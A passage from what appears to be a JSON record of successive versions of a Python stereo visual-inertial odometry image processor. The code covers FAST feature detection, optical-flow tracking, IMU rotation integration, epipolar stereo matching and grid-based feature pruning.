\"\"\"\n img = self.cam0_curr_img_msg.image\n grid_height, grid_width = self.get_grid_size(img)\n new_features = self.detector.detect(img)\n cam0_points = [kp.pt for kp in new_features]\n cam1_points, inlier_markers = self.stereo_match(cam0_points)\n cam0_inliers, cam1_inliers = [], []\n response_inliers = []\n for i, inlier in enumerate(inlier_markers):\n if not inlier:\n continue\n cam0_inliers.append(cam0_points[i])\n cam1_inliers.append(cam1_points[i])\n response_inliers.append(new_features[i].response)\n grid_new_features = [[] for _ in range(self.config.grid_num)]\n for i in range(len(cam0_inliers)):\n cam0_point = cam0_inliers[i]\n cam1_point = cam1_inliers[i]\n response = response_inliers[i]\n row = int(cam0_point[1] / grid_height)\n col = int(cam0_point[0] / grid_width)\n code = row * self.config.grid_col + col\n new_feature = FeatureMetaData()\n new_feature.response = response\n new_feature.cam0_point = cam0_point\n new_feature.cam1_point = cam1_point\n grid_new_features[code].append(new_feature)\n for i, new_features in enumerate(grid_new_features):\n for feature in sorted(new_features, key=lambda x: x.response,\n reverse=True)[:self.config.grid_min_feature_num]:\n self.curr_features[i].append(feature)\n self.curr_features[i][-1].id = self.next_feature_id\n self.curr_features[i][-1].lifetime = 1\n self.next_feature_id += 1\n\n def track_features(self):\n \"\"\"\n Tracker features on the newly received stereo images.\n \"\"\"\n img = self.cam0_curr_img_msg.image\n grid_height, grid_width = self.get_grid_size(img)\n cam0_R_p_c, cam1_R_p_c = self.integrate_imu_data()\n prev_ids = []\n prev_lifetime = []\n prev_cam0_points = []\n prev_cam1_points = []\n for feature in chain.from_iterable(self.prev_features):\n prev_ids.append(feature.id)\n prev_lifetime.append(feature.lifetime)\n prev_cam0_points.append(feature.cam0_point)\n prev_cam1_points.append(feature.cam1_point)\n prev_cam0_points = np.array(prev_cam0_points, dtype=np.float32)\n self.num_features['before_tracking'] = len(prev_cam0_points)\n if len(prev_cam0_points) == 0:\n return\n curr_cam0_points = self.predict_feature_tracking(prev_cam0_points,\n cam0_R_p_c, self.cam0_intrinsics)\n curr_cam0_points, track_inliers, _ = cv2.calcOpticalFlowPyrLK(self.\n prev_cam0_pyramid, self.curr_cam0_pyramid, prev_cam0_points.\n astype(np.float32), curr_cam0_points.astype(np.float32), **self\n .config.lk_params)\n for i, point in enumerate(curr_cam0_points):\n if not track_inliers[i]:\n continue\n if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1\n ] < 0 or point[1] > img.shape[0] - 1:\n track_inliers[i] = 0\n prev_tracked_ids = select(prev_ids, track_inliers)\n prev_tracked_lifetime = select(prev_lifetime, track_inliers)\n prev_tracked_cam0_points = select(prev_cam0_points, track_inliers)\n prev_tracked_cam1_points = select(prev_cam1_points, track_inliers)\n curr_tracked_cam0_points = select(curr_cam0_points, track_inliers)\n self.num_features['after_tracking'] = len(curr_tracked_cam0_points)\n curr_cam1_points, match_inliers = self.stereo_match(\n curr_tracked_cam0_points)\n prev_matched_ids = select(prev_tracked_ids, match_inliers)\n prev_matched_lifetime = select(prev_tracked_lifetime, match_inliers)\n prev_matched_cam0_points = select(prev_tracked_cam0_points,\n match_inliers)\n prev_matched_cam1_points = select(prev_tracked_cam1_points,\n match_inliers)\n curr_matched_cam0_points = select(curr_tracked_cam0_points,\n match_inliers)\n curr_matched_cam1_points = select(curr_cam1_points, match_inliers)\n 
self.num_features['after_matching'] = len(curr_matched_cam0_points)\n cam0_ransac_inliers = [1] * len(prev_matched_cam0_points)\n cam1_ransac_inliers = [1] * len(prev_matched_cam1_points)\n after_ransac = 0\n for i in range(len(cam0_ransac_inliers)):\n if not (cam0_ransac_inliers[i] and cam1_ransac_inliers[i]):\n continue\n row = int(curr_matched_cam0_points[i][1] / grid_height)\n col = int(curr_matched_cam0_points[i][0] / grid_width)\n code = row * self.config.grid_col + col\n grid_new_feature = FeatureMetaData()\n grid_new_feature.id = prev_matched_ids[i]\n grid_new_feature.lifetime = prev_matched_lifetime[i] + 1\n grid_new_feature.cam0_point = curr_matched_cam0_points[i]\n grid_new_feature.cam1_point = curr_matched_cam1_points[i]\n prev_matched_lifetime[i] += 1\n self.curr_features[code].append(grid_new_feature)\n after_ransac += 1\n self.num_features['after_ransac'] = after_ransac\n\n def add_new_features(self):\n \"\"\"\n Detect new features on the image to ensure that the features are \n uniformly distributed on the image.\n \"\"\"\n curr_img = self.cam0_curr_img_msg.image\n grid_height, grid_width = self.get_grid_size(curr_img)\n mask = np.ones(curr_img.shape[:2], dtype='uint8')\n for feature in chain.from_iterable(self.curr_features):\n x, y = map(int, feature.cam0_point)\n mask[y - 3:y + 4, x - 3:x + 4] = 0\n new_features = self.detector.detect(curr_img, mask=mask)\n new_feature_sieve = [[] for _ in range(self.config.grid_num)]\n for feature in new_features:\n row = int(feature.pt[1] / grid_height)\n col = int(feature.pt[0] / grid_width)\n code = row * self.config.grid_col + col\n new_feature_sieve[code].append(feature)\n new_features = []\n for features in new_feature_sieve:\n if len(features) > self.config.grid_max_feature_num:\n features = sorted(features, key=lambda x: x.response,\n reverse=True)[:self.config.grid_max_feature_num]\n new_features.append(features)\n new_features = list(chain.from_iterable(new_features))\n cam0_points = [kp.pt for kp in new_features]\n cam1_points, inlier_markers = self.stereo_match(cam0_points)\n cam0_inliers, cam1_inliers, response_inliers = [], [], []\n for i, inlier in enumerate(inlier_markers):\n if not inlier:\n continue\n cam0_inliers.append(cam0_points[i])\n cam1_inliers.append(cam1_points[i])\n response_inliers.append(new_features[i].response)\n grid_new_features = [[] for _ in range(self.config.grid_num)]\n for i in range(len(cam0_inliers)):\n cam0_point = cam0_inliers[i]\n cam1_point = cam1_inliers[i]\n response = response_inliers[i]\n row = int(cam0_point[1] / grid_height)\n col = int(cam0_point[0] / grid_width)\n code = row * self.config.grid_col + col\n new_feature = FeatureMetaData()\n new_feature.response = response\n new_feature.cam0_point = cam0_point\n new_feature.cam1_point = cam1_point\n grid_new_features[code].append(new_feature)\n for i, new_features in enumerate(grid_new_features):\n for feature in sorted(new_features, key=lambda x: x.response,\n reverse=True)[:self.config.grid_min_feature_num]:\n self.curr_features[i].append(feature)\n self.curr_features[i][-1].id = self.next_feature_id\n self.curr_features[i][-1].lifetime = 1\n self.next_feature_id += 1\n\n def prune_features(self):\n \"\"\"\n Remove some of the features of a grid in case there are too many \n features inside of that grid, which ensures the number of features \n within each grid is bounded.\n \"\"\"\n for i, features in enumerate(self.curr_features):\n if len(features) <= self.config.grid_max_feature_num:\n continue\n self.curr_features[i] = 
sorted(features, key=lambda x: x.\n lifetime, reverse=True)[:self.config.grid_max_feature_num]\n\n def load_features(self):\n filename = self.config.result_dir + str(self.image_id) + '.npz'\n self.curr_features = np.load(filename, allow_pickle=True)['arr_0']\n self.image_id += 1\n\n def save_features(self):\n filename = self.config.result_dir + str(self.image_id) + '.npz'\n np.savez(filename, self.curr_features)\n self.image_id += 1\n\n def publish(self):\n \"\"\"\n Publish the features on the current image including both the \n tracked and newly detected ones.\n \"\"\"\n curr_ids = []\n curr_cam0_points = []\n curr_cam1_points = []\n for feature in chain.from_iterable(self.curr_features):\n curr_ids.append(feature.id)\n curr_cam0_points.append(feature.cam0_point)\n curr_cam1_points.append(feature.cam1_point)\n curr_cam0_points_undistorted = self.undistort_points(curr_cam0_points,\n self.cam0_intrinsics, self.cam0_distortion_model, self.\n cam0_distortion_coeffs)\n curr_cam1_points_undistorted = self.undistort_points(curr_cam1_points,\n self.cam1_intrinsics, self.cam1_distortion_model, self.\n cam1_distortion_coeffs)\n features = []\n for i in range(len(curr_ids)):\n fm = FeatureMeasurement()\n fm.id = curr_ids[i]\n fm.u0 = curr_cam0_points_undistorted[i][0]\n fm.v0 = curr_cam0_points_undistorted[i][1]\n fm.u1 = curr_cam1_points_undistorted[i][0]\n fm.v1 = curr_cam1_points_undistorted[i][1]\n features.append(fm)\n feature_msg = namedtuple('feature_msg', ['timestamp', 'features'])(self\n .cam0_curr_img_msg.timestamp, features)\n return feature_msg\n\n def integrate_imu_data(self):\n \"\"\"\n Integrates the IMU gyro readings between the two consecutive images, \n which is used for both tracking prediction and 2-point RANSAC.\n\n Returns:\n cam0_R_p_c: a rotation matrix which takes a vector from previous \n cam0 frame to current cam0 frame.\n cam1_R_p_c: a rotation matrix which takes a vector from previous \n cam1 frame to current cam1 frame.\n \"\"\"\n idx_begin = None\n for i, msg in enumerate(self.imu_msg_buffer):\n if msg.timestamp >= self.cam0_prev_img_msg.timestamp - 0.01:\n idx_begin = i\n break\n idx_end = None\n for i, msg in enumerate(self.imu_msg_buffer):\n if msg.timestamp >= self.cam0_curr_img_msg.timestamp - 0.004:\n idx_end = i\n break\n if idx_begin is None or idx_end is None:\n return np.identity(3), np.identity(3)\n mean_ang_vel = np.zeros(3)\n for i in range(idx_begin, idx_end):\n mean_ang_vel += self.imu_msg_buffer[i].angular_velocity\n if idx_end > idx_begin:\n mean_ang_vel /= idx_end - idx_begin\n cam0_mean_ang_vel = self.R_cam0_imu.T @ mean_ang_vel\n cam1_mean_ang_vel = self.R_cam1_imu.T @ mean_ang_vel\n dt = (self.cam0_curr_img_msg.timestamp - self.cam0_prev_img_msg.\n timestamp)\n cam0_R_p_c = cv2.Rodrigues(cam0_mean_ang_vel * dt)[0].T\n cam1_R_p_c = cv2.Rodrigues(cam1_mean_ang_vel * dt)[0].T\n self.imu_msg_buffer = self.imu_msg_buffer[idx_end:]\n return cam0_R_p_c, cam1_R_p_c\n\n def rescale_points(self, pts1, pts2):\n \"\"\"\n Arguments:\n pts1: first set of points.\n pts2: second set of points.\n\n Returns:\n pts1: scaled first set of points.\n pts2: scaled second set of points.\n scaling_factor: scaling factor\n \"\"\"\n scaling_factor = 0\n for pt1, pt2 in zip(pts1, pts2):\n scaling_factor += np.linalg.norm(pt1)\n scaling_factor += np.linalg.norm(pt2)\n scaling_factor = (len(pts1) + len(pts2)) / scaling_factor * np.sqrt(2)\n for i in range(len(pts1)):\n pts1[i] *= scaling_factor\n pts2[i] *= scaling_factor\n return pts1, pts2, scaling_factor\n\n def 
get_grid_size(self, img):\n \"\"\"\n # Size of each grid.\n \"\"\"\n grid_height = int(np.ceil(img.shape[0] / self.config.grid_row))\n grid_width = int(np.ceil(img.shape[1] / self.config.grid_col))\n return grid_height, grid_width\n\n def predict_feature_tracking(self, input_pts, R_p_c, intrinsics):\n \"\"\"\n predictFeatureTracking Compensates the rotation between consecutive \n camera frames so that feature tracking would be more robust and fast.\n\n Arguments:\n input_pts: features in the previous image to be tracked.\n R_p_c: a rotation matrix takes a vector in the previous camera \n frame to the current camera frame. (matrix33)\n intrinsics: intrinsic matrix of the camera. (vec3)\n\n Returns:\n compensated_pts: predicted locations of the features in the \n current image based on the provided rotation.\n \"\"\"\n if len(input_pts) == 0:\n return []\n K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics\n [1], intrinsics[3]], [0.0, 0.0, 1.0]])\n H = K @ R_p_c @ np.linalg.inv(K)\n compensated_pts = []\n for i in range(len(input_pts)):\n p1 = np.array([*input_pts[i], 1.0])\n p2 = H @ p1\n compensated_pts.append(p2[:2] / p2[2])\n return np.array(compensated_pts, dtype=np.float32)\n\n def stereo_match(self, cam0_points):\n \"\"\"\n Matches features with stereo image pairs.\n\n Arguments:\n cam0_points: points in the primary image.\n\n Returns:\n cam1_points: points in the secondary image.\n inlier_markers: 1 if the match is valid, 0 otherwise.\n \"\"\"\n cam0_points = np.array(cam0_points)\n if len(cam0_points) == 0:\n return []\n R_cam0_cam1 = self.R_cam1_imu.T @ self.R_cam0_imu\n cam0_points_undistorted = self.undistort_points(cam0_points, self.\n cam0_intrinsics, self.cam0_distortion_model, self.\n cam0_distortion_coeffs, R_cam0_cam1)\n cam1_points = self.distort_points(cam0_points_undistorted, self.\n cam1_intrinsics, self.cam1_distortion_model, self.\n cam1_distortion_coeffs)\n cam1_points_copy = cam1_points.copy()\n cam0_points = cam0_points.astype(np.float32)\n cam1_points = cam1_points.astype(np.float32)\n cam1_points, inlier_markers, _ = cv2.calcOpticalFlowPyrLK(self.\n curr_cam0_pyramid, self.curr_cam1_pyramid, cam0_points,\n cam1_points, **self.config.lk_params)\n cam0_points_, _, _ = cv2.calcOpticalFlowPyrLK(self.\n curr_cam1_pyramid, self.curr_cam0_pyramid, cam1_points,\n cam0_points.copy(), **self.config.lk_params)\n err = np.linalg.norm(cam0_points - cam0_points_, axis=1)\n disparity = np.abs(cam1_points_copy[:, 1] - cam1_points[:, 1])\n inlier_markers = np.logical_and.reduce([inlier_markers.reshape(-1),\n err < 3, disparity < 20])\n img = self.cam1_curr_img_msg.image\n for i, point in enumerate(cam1_points):\n if not inlier_markers[i]:\n continue\n if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1\n ] < 0 or point[1] > img.shape[0] - 1:\n inlier_markers[i] = 0\n t_cam0_cam1 = self.R_cam1_imu.T @ (self.t_cam0_imu - self.t_cam1_imu)\n E = skew(t_cam0_cam1) @ R_cam0_cam1\n cam0_points_undistorted = self.undistort_points(cam0_points, self.\n cam0_intrinsics, self.cam0_distortion_model, self.\n cam0_distortion_coeffs)\n cam1_points_undistorted = self.undistort_points(cam1_points, self.\n cam1_intrinsics, self.cam1_distortion_model, self.\n cam1_distortion_coeffs)\n norm_pixel_unit = 4.0 / (self.cam0_intrinsics[0] + self.\n cam0_intrinsics[1] + self.cam1_intrinsics[0] + self.\n cam1_intrinsics[1])\n for i in range(len(cam0_points_undistorted)):\n if not inlier_markers[i]:\n continue\n pt0 = np.array([*cam0_points_undistorted[i], 1.0])\n pt1 = 
np.array([*cam1_points_undistorted[i], 1.0])\n epipolar_line = E @ pt0\n error = np.abs(pt1 @ epipolar_line) / np.linalg.norm(\n epipolar_line[:2])\n if error > self.config.stereo_threshold * norm_pixel_unit:\n inlier_markers[i] = 0\n return cam1_points, inlier_markers\n\n def undistort_points(self, pts_in, intrinsics, distortion_model,\n distortion_coeffs, rectification_matrix=np.identity(3),\n new_intrinsics=np.array([1, 1, 0, 0])):\n \"\"\"\n Arguments:\n pts_in: points to be undistorted.\n intrinsics: intrinsics of the camera.\n distortion_model: distortion model of the camera.\n distortion_coeffs: distortion coefficients.\n rectification_matrix:\n new_intrinsics:\n\n Returns:\n pts_out: undistorted points.\n \"\"\"\n if len(pts_in) == 0:\n return []\n pts_in = np.reshape(pts_in, (-1, 1, 2))\n K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics\n [1], intrinsics[3]], [0.0, 0.0, 1.0]])\n K_new = np.array([[new_intrinsics[0], 0.0, new_intrinsics[2]], [0.0,\n new_intrinsics[1], new_intrinsics[3]], [0.0, 0.0, 1.0]])\n if distortion_model == 'equidistant':\n pts_out = cv2.fisheye.undistortPoints(pts_in, K,\n distortion_coeffs, rectification_matrix, K_new)\n else:\n pts_out = cv2.undistortPoints(pts_in, K, distortion_coeffs,\n None, rectification_matrix, K_new)\n return pts_out.reshape((-1, 2))\n\n def distort_points(self, pts_in, intrinsics, distortion_model,\n distortion_coeffs):\n \"\"\"\n Arguments:\n pts_in: points to be distorted.\n intrinsics: intrinsics of the camera.\n distortion_model: distortion model of the camera.\n distortion_coeffs: distortion coefficients.\n\n Returns:\n pts_out: distorted points. (N, 2)\n \"\"\"\n if len(pts_in) == 0:\n return []\n K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics\n [1], intrinsics[3]], [0.0, 0.0, 1.0]])\n if distortion_model == 'equidistant':\n pts_out = cv2.fisheye.distortPoints(pts_in, K, distortion_coeffs)\n else:\n homogenous_pts = cv2.convertPointsToHomogeneous(pts_in)\n pts_out, _ = cv2.projectPoints(homogenous_pts, np.zeros(3), np.\n zeros(3), K, distortion_coeffs)\n return pts_out.reshape((-1, 2))\n\n def draw_features_stereo(self):\n img0 = self.cam0_curr_img_msg.image\n img1 = self.cam1_curr_img_msg.image\n kps0 = []\n kps1 = []\n matches = []\n for feature in chain.from_iterable(self.curr_features):\n matches.append(cv2.DMatch(len(kps0), len(kps0), 0))\n kps0.append(cv2.KeyPoint(*feature.cam0_point, 1))\n kps1.append(cv2.KeyPoint(*feature.cam1_point, 1))\n img = cv2.drawMatches(img0, kps0, img1, kps1, matches, None, flags=2)\n cv2.imshow('stereo features', img)\n cv2.waitKey(1)\n\n\n<mask token>\n",
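The epipolar gate in stereo_match scores each candidate match by the distance from pt1 to the epipolar line E @ pt0, where the scalar residual is the dot product pt1 @ (E @ pt0) normalized by the line direction. A toy example for an assumed horizontal-baseline rig (all numbers invented for illustration; skew() stands in for the helper the tracker imports):

import numpy as np

def skew(v):
    # Cross-product matrix [v]_x, standing in for the skew() helper above.
    return np.array([[0.0, -v[2], v[1]],
                     [v[2], 0.0, -v[0]],
                     [-v[1], v[0], 0.0]])

R = np.identity(3)               # assumed: cameras rotationally aligned
t = np.array([-0.11, 0.0, 0.0])  # assumed: 11 cm horizontal baseline
E = skew(t) @ R

pt0 = np.array([0.10, -0.05, 1.0])  # normalized point in cam0
pt1 = np.array([0.09, -0.05, 1.0])  # true match: shifted along x only
line = E @ pt0
assert abs(pt1 @ line) / np.linalg.norm(line[:2]) < 1e-9  # on the line
bad = np.array([0.09, 0.02, 1.0])   # vertical offset violates the constraint
assert abs(bad @ line) / np.linalg.norm(line[:2]) > 1e-3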
"step-5": "import numpy as np\r\nimport cv2\r\nimport time\r\n\r\nfrom itertools import chain, compress\r\nfrom collections import defaultdict, namedtuple\r\n\r\n\r\n\r\nclass FeatureMetaData(object):\r\n \"\"\"\r\n Contain necessary information of a feature for easy access.\r\n \"\"\"\r\n def __init__(self):\r\n self.id = None # int\r\n self.response = None # float\r\n self.lifetime = None # int\r\n self.cam0_point = None # vec2\r\n self.cam1_point = None # vec2\r\n\r\n\r\nclass FeatureMeasurement(object):\r\n \"\"\"\r\n Stereo measurement of a feature.\r\n \"\"\"\r\n def __init__(self):\r\n self.id = None\r\n self.u0 = None\r\n self.v0 = None\r\n self.u1 = None\r\n self.v1 = None\r\n\r\n\r\n\r\nclass ImageProcessor(object):\r\n \"\"\"\r\n Detect and track features in image sequences.\r\n \"\"\"\r\n def __init__(self, config):\r\n self.config = config\r\n\r\n # Indicate if this is the first image message.\r\n self.is_first_img = True\r\n\r\n # ID for the next new feature.\r\n self.next_feature_id = 0\r\n\r\n # Feature detector\r\n self.detector = cv2.FastFeatureDetector_create(self.config.fast_threshold)\r\n\r\n # IMU message buffer.\r\n self.imu_msg_buffer = []\r\n\r\n # Previous and current images\r\n self.cam0_prev_img_msg = None\r\n self.cam0_curr_img_msg = None\r\n self.cam1_curr_img_msg = None\r\n\r\n # Pyramids for previous and current image\r\n self.prev_cam0_pyramid = None\r\n self.curr_cam0_pyramid = None\r\n self.curr_cam1_pyramid = None\r\n\r\n # Features in the previous and current image.\r\n # list of lists of FeatureMetaData\r\n self.prev_features = [[] for _ in range(self.config.grid_num)] # Don't use [[]] * N\r\n self.curr_features = [[] for _ in range(self.config.grid_num)]\r\n\r\n # Number of features after each outlier removal step.\r\n # keys: before_tracking, after_tracking, after_matching, after_ransac\r\n self.num_features = defaultdict(int)\r\n\r\n # load config\r\n # Camera calibration parameters\r\n self.cam0_resolution = config.cam0_resolution # vec2\r\n self.cam0_intrinsics = config.cam0_intrinsics # vec4\r\n self.cam0_distortion_model = config.cam0_distortion_model # string\r\n self.cam0_distortion_coeffs = config.cam0_distortion_coeffs # vec4\r\n\r\n self.cam1_resolution = config.cam1_resolution # vec2\r\n self.cam1_intrinsics = config.cam1_intrinsics # vec4\r\n self.cam1_distortion_model = config.cam1_distortion_model # string\r\n self.cam1_distortion_coeffs = config.cam1_distortion_coeffs # vec4\r\n\r\n # Take a vector from cam0 frame to the IMU frame.\r\n self.T_cam0_imu = np.linalg.inv(config.T_imu_cam0)\r\n self.R_cam0_imu = self.T_cam0_imu[:3, :3]\r\n self.t_cam0_imu = self.T_cam0_imu[:3, 3]\r\n # Take a vector from cam1 frame to the IMU frame.\r\n self.T_cam1_imu = np.linalg.inv(config.T_imu_cam1)\r\n self.R_cam1_imu = self.T_cam1_imu[:3, :3]\r\n self.t_cam1_imu = self.T_cam1_imu[:3, 3]\r\n\r\n self.image_id = 0\r\n\r\n def stereo_callback(self, stereo_msg):\r\n \"\"\"\r\n Callback function for the stereo images.\r\n \"\"\"\r\n start = time.time()\r\n self.cam0_curr_img_msg = stereo_msg.cam0_msg\r\n self.cam1_curr_img_msg = stereo_msg.cam1_msg\r\n\r\n # Build the image pyramids once since they're used at multiple places.\r\n self.create_image_pyramids()\r\n\r\n # Detect features in the first frame.\r\n if self.is_first_img:\r\n if not self.config.load_features_flag:\r\n self.initialize_first_frame()\r\n self.is_first_img = False\r\n # Draw results.\r\n # self.draw_features_stereo()\r\n else:\r\n if not self.config.load_features_flag:\r\n # Track the 
feature in the previous image.\r\n t = time.time()\r\n self.track_features()\r\n print('___track_features:', time.time() - t)\r\n t = time.time()\r\n\r\n # Add new features into the current image.\r\n self.add_new_features()\r\n print('___add_new_features:', time.time() - t)\r\n t = time.time()\r\n self.prune_features()\r\n print('___prune_features:', time.time() - t)\r\n t = time.time()\r\n # Draw results.\r\n # self.draw_features_stereo()\r\n print('___draw_features_stereo:', time.time() - t)\r\n t = time.time()\r\n\r\n print('===image process elapsed:', time.time() - start, f'({stereo_msg.timestamp})')\r\n\r\n if not self.config.load_features_flag:\r\n try:\r\n self.save_features() \r\n return self.publish()\r\n finally:\r\n self.cam0_prev_img_msg = self.cam0_curr_img_msg\r\n self.prev_features = self.curr_features\r\n self.prev_cam0_pyramid = self.curr_cam0_pyramid\r\n\r\n # Initialize the current features to empty vectors.\r\n self.curr_features = [[] for _ in range(self.config.grid_num)]\r\n else:\r\n self.load_features()\r\n return self.publish()\r\n\r\n def imu_callback(self, msg):\r\n \"\"\"\r\n Callback function for the imu message.\r\n \"\"\"\r\n self.imu_msg_buffer.append(msg)\r\n\r\n def create_image_pyramids(self):\r\n \"\"\"\r\n Create image pyramids used for KLT tracking.\r\n (Seems doesn't work in python)\r\n \"\"\"\r\n curr_cam0_img = self.cam0_curr_img_msg.image\r\n # self.curr_cam0_pyramid = cv2.buildOpticalFlowPyramid(\r\n # curr_cam0_img, self.config.win_size, self.config.pyramid_levels, \r\n # None, cv2.BORDER_REFLECT_101, cv2.BORDER_CONSTANT, False)[1]\r\n self.curr_cam0_pyramid = curr_cam0_img\r\n\r\n curr_cam1_img = self.cam1_curr_img_msg.image\r\n # self.curr_cam1_pyramid = cv2.buildOpticalFlowPyramid(\r\n # curr_cam1_img, self.config.win_size, self.config.pyramid_levels, \r\n # None, cv2.BORDER_REFLECT_101, cv2.BORDER_CONSTANT, False)[1]\r\n self.curr_cam1_pyramid = curr_cam1_img\r\n\r\n def initialize_first_frame(self):\r\n \"\"\"\r\n Initialize the image processing sequence, which is basically detect \r\n new features on the first set of stereo images.\r\n \"\"\"\r\n img = self.cam0_curr_img_msg.image\r\n grid_height, grid_width = self.get_grid_size(img)\r\n\r\n # Detect new features on the frist image.\r\n new_features = self.detector.detect(img)\r\n\r\n # Find the stereo matched points for the newly detected features.\r\n cam0_points = [kp.pt for kp in new_features]\r\n cam1_points, inlier_markers = self.stereo_match(cam0_points)\r\n\r\n cam0_inliers, cam1_inliers = [], []\r\n response_inliers = []\r\n for i, inlier in enumerate(inlier_markers):\r\n if not inlier:\r\n continue\r\n cam0_inliers.append(cam0_points[i])\r\n cam1_inliers.append(cam1_points[i])\r\n response_inliers.append(new_features[i].response)\r\n # len(cam0_inliers) < max(5, 0.1 * len(new_features))\r\n\r\n # Group the features into grids\r\n grid_new_features = [[] for _ in range(self.config.grid_num)]\r\n\r\n for i in range(len(cam0_inliers)):\r\n cam0_point = cam0_inliers[i]\r\n cam1_point = cam1_inliers[i]\r\n response = response_inliers[i]\r\n\r\n row = int(cam0_point[1] / grid_height)\r\n col = int(cam0_point[0] / grid_width)\r\n code = row*self.config.grid_col + col\r\n\r\n new_feature = FeatureMetaData()\r\n new_feature.response = response\r\n new_feature.cam0_point = cam0_point\r\n new_feature.cam1_point = cam1_point\r\n grid_new_features[code].append(new_feature)\r\n\r\n # Sort the new features in each grid based on its response.\r\n # And collect new features within each grid with 
high response.\r\n for i, new_features in enumerate(grid_new_features):\r\n for feature in sorted(new_features, key=lambda x:x.response, \r\n reverse=True)[:self.config.grid_min_feature_num]:\r\n self.curr_features[i].append(feature)\r\n self.curr_features[i][-1].id = self.next_feature_id\r\n self.curr_features[i][-1].lifetime = 1\r\n self.next_feature_id += 1\r\n\r\n def track_features(self):\r\n \"\"\"\r\n Tracker features on the newly received stereo images.\r\n \"\"\"\r\n img = self.cam0_curr_img_msg.image\r\n grid_height, grid_width = self.get_grid_size(img)\r\n\r\n # Compute a rough relative rotation which takes a vector \r\n # from the previous frame to the current frame.\r\n cam0_R_p_c, cam1_R_p_c = self.integrate_imu_data()\r\n\r\n # Organize the features in the previous image.\r\n prev_ids = []\r\n prev_lifetime = []\r\n prev_cam0_points = []\r\n prev_cam1_points = []\r\n\r\n for feature in chain.from_iterable(self.prev_features):\r\n prev_ids.append(feature.id)\r\n prev_lifetime.append(feature.lifetime)\r\n prev_cam0_points.append(feature.cam0_point)\r\n prev_cam1_points.append(feature.cam1_point)\r\n prev_cam0_points = np.array(prev_cam0_points, dtype=np.float32)\r\n\r\n # Number of the features before tracking.\r\n self.num_features['before_tracking'] = len(prev_cam0_points)\r\n\r\n # Abort tracking if there is no features in the previous frame.\r\n if len(prev_cam0_points) == 0:\r\n return\r\n\r\n # Track features using LK optical flow method.\r\n curr_cam0_points = self.predict_feature_tracking(\r\n prev_cam0_points, cam0_R_p_c, self.cam0_intrinsics)\r\n\r\n curr_cam0_points, track_inliers, _ = cv2.calcOpticalFlowPyrLK(\r\n self.prev_cam0_pyramid, self.curr_cam0_pyramid,\r\n prev_cam0_points.astype(np.float32), \r\n curr_cam0_points.astype(np.float32), \r\n **self.config.lk_params)\r\n \r\n # Mark those tracked points out of the image region as untracked.\r\n for i, point in enumerate(curr_cam0_points):\r\n if not track_inliers[i]:\r\n continue\r\n if (point[0] < 0 or point[0] > img.shape[1]-1 or \r\n point[1] < 0 or point[1] > img.shape[0]-1):\r\n track_inliers[i] = 0\r\n\r\n # Collect the tracked points.\r\n prev_tracked_ids = select(prev_ids, track_inliers)\r\n prev_tracked_lifetime = select(prev_lifetime, track_inliers)\r\n prev_tracked_cam0_points = select(prev_cam0_points, track_inliers)\r\n prev_tracked_cam1_points = select(prev_cam1_points, track_inliers)\r\n curr_tracked_cam0_points = select(curr_cam0_points, track_inliers)\r\n\r\n # Number of features left after tracking.\r\n self.num_features['after_tracking'] = len(curr_tracked_cam0_points)\r\n\r\n # Outlier removal involves three steps, which forms a close\r\n # loop between the previous and current frames of cam0 (left)\r\n # and cam1 (right). 
Assuming the stereo matching between the\r\n # previous cam0 and cam1 images are correct, the three steps are:\r\n #\r\n # prev frames cam0 ----------> cam1\r\n # | |\r\n # |ransac |ransac\r\n # | stereo match |\r\n # curr frames cam0 ----------> cam1\r\n #\r\n # 1) Stereo matching between current images of cam0 and cam1.\r\n # 2) RANSAC between previous and current images of cam0.\r\n # 3) RANSAC between previous and current images of cam1.\r\n #\r\n # For Step 3, tracking between the images is no longer needed.\r\n # The stereo matching results are directly used in the RANSAC.\r\n\r\n # Step 1: stereo matching.\r\n curr_cam1_points, match_inliers = self.stereo_match(\r\n curr_tracked_cam0_points)\r\n\r\n prev_matched_ids = select(prev_tracked_ids, match_inliers)\r\n prev_matched_lifetime = select(prev_tracked_lifetime, match_inliers)\r\n prev_matched_cam0_points = select(prev_tracked_cam0_points, match_inliers)\r\n prev_matched_cam1_points = select(prev_tracked_cam1_points, match_inliers)\r\n curr_matched_cam0_points = select(curr_tracked_cam0_points, match_inliers)\r\n curr_matched_cam1_points = select(curr_cam1_points, match_inliers)\r\n\r\n # Number of features left after stereo matching.\r\n self.num_features['after_matching'] = len(curr_matched_cam0_points)\r\n\r\n # Step 2 and 3: RANSAC on temporal image pairs of cam0 and cam1.\r\n # cam0_ransac_inliers = self.two_point_ransac(\r\n # prev_matched_cam0_points, curr_matched_cam0_points,\r\n # cam0_R_p_c, self.cam0_intrinsics, \r\n # self.cam0_distortion_model, self.cam0_distortion_coeffs, \r\n # self.config.ransac_threshold, 0.99)\r\n\r\n # cam1_ransac_inliers = self.two_point_ransac(\r\n # prev_matched_cam1_points, curr_matched_cam1_points,\r\n # cam1_R_p_c, self.cam1_intrinsics, \r\n # self.cam1_distortion_model, self.cam1_distortion_coeffs, \r\n # self.config.ransac_threshold, 0.99)\r\n cam0_ransac_inliers = [1] * len(prev_matched_cam0_points)\r\n cam1_ransac_inliers = [1] * len(prev_matched_cam1_points)\r\n\r\n # Number of features after ransac.\r\n after_ransac = 0\r\n for i in range(len(cam0_ransac_inliers)):\r\n if not (cam0_ransac_inliers[i] and cam1_ransac_inliers[i]):\r\n continue \r\n row = int(curr_matched_cam0_points[i][1] / grid_height)\r\n col = int(curr_matched_cam0_points[i][0] / grid_width)\r\n code = row * self.config.grid_col + col\r\n\r\n grid_new_feature = FeatureMetaData()\r\n grid_new_feature.id = prev_matched_ids[i]\r\n grid_new_feature.lifetime = prev_matched_lifetime[i] + 1\r\n grid_new_feature.cam0_point = curr_matched_cam0_points[i]\r\n grid_new_feature.cam1_point = curr_matched_cam1_points[i]\r\n prev_matched_lifetime[i] += 1\r\n\r\n self.curr_features[code].append(grid_new_feature)\r\n after_ransac += 1\r\n self.num_features['after_ransac'] = after_ransac\r\n\r\n # Compute the tracking rate.\r\n # prev_feature_num = sum([len(x) for x in self.prev_features])\r\n # curr_feature_num = sum([len(x) for x in self.curr_features])\r\n \r\n\r\n def add_new_features(self):\r\n \"\"\"\r\n Detect new features on the image to ensure that the features are \r\n uniformly distributed on the 